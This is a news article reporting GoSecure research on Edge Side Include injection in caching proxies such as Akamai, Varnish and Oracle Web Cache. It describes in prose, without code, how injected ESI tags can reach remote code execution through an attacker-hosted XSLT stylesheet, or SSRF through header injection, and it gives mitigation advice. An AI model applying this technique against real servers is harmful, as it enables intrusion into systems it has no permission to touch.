Researchers discover new ways to leverage markup language
The exploit involves injecting malicious XML tags within HTML caching configurations that use Edge Side Includes.
Edge Side Includes, or ESI, is an XML-based markup language used to temporarily store dynamic web files that are not saved through regular web caching protocols.
It was invented to improve web page accessibility, but is only processed by certain proxy servers, such as Akamai or Varnish.
“An attacker can abuse this mechanism by injecting a malicious tag inside an intercepted web page,” said GoSecure researcher Philippe Arteau in a blog post published yesterday, highlighting the implications of the attack vector, first discovered in April 2018.
Louis Dion-Marcil, another GoSecure researcher who spoke about abusing caching servers at last year’s DEF CON, added how the ESI implementation protocol hadn’t been updated since 2001.
“HTTP surrogates are not able to distinguish between legitimate ESI tags provided by the upstream server and malicious ones injected in the HTTP response,” he said.
“In other words, if an attacker can successfully reflect ESI tags in the HTTP response, then the surrogate will blindly parse and evaluate them, believing they are legitimate tags that are served from the upstream server.”
Edge Side Exploits
The latest findings from GoSecure shows how a malicious ESI tag can be used – at least in one case – to trigger RCE.
“The stylesheet attribute will point to a malicious XSLT resource hosted on a remote server controlled by the attacker,” Arteau said.
“The XSLT processing is triggered automatically by ESI-Gate when the included tag has a remote stylesheet.
“By default, the XML parser in Java allows the import of Java functions. This can easily lead to arbitrary code execution.”
In another instance, a header injection can occur in the Oracle Web Cache, leading to Server-Side Request Forgery (SSRF).
Users are recommended to update to the latest version of Oracle Web Cache and only use HTML encoding in order to prevent attackers from injecting malicious ESI tags.
“The ESI specification does not provide a mechanism to authenticate that a tag has been legitimately issued by the backend,” Arteau said.
“For this reason, any caching proxy with ESI enable will continue to have potential issues like the one we describe.”
Arteau and Dion-Marcil’s work into Edge Side Include Injection was included in PortSwigger’s top 10 web hacking techniques of 2018.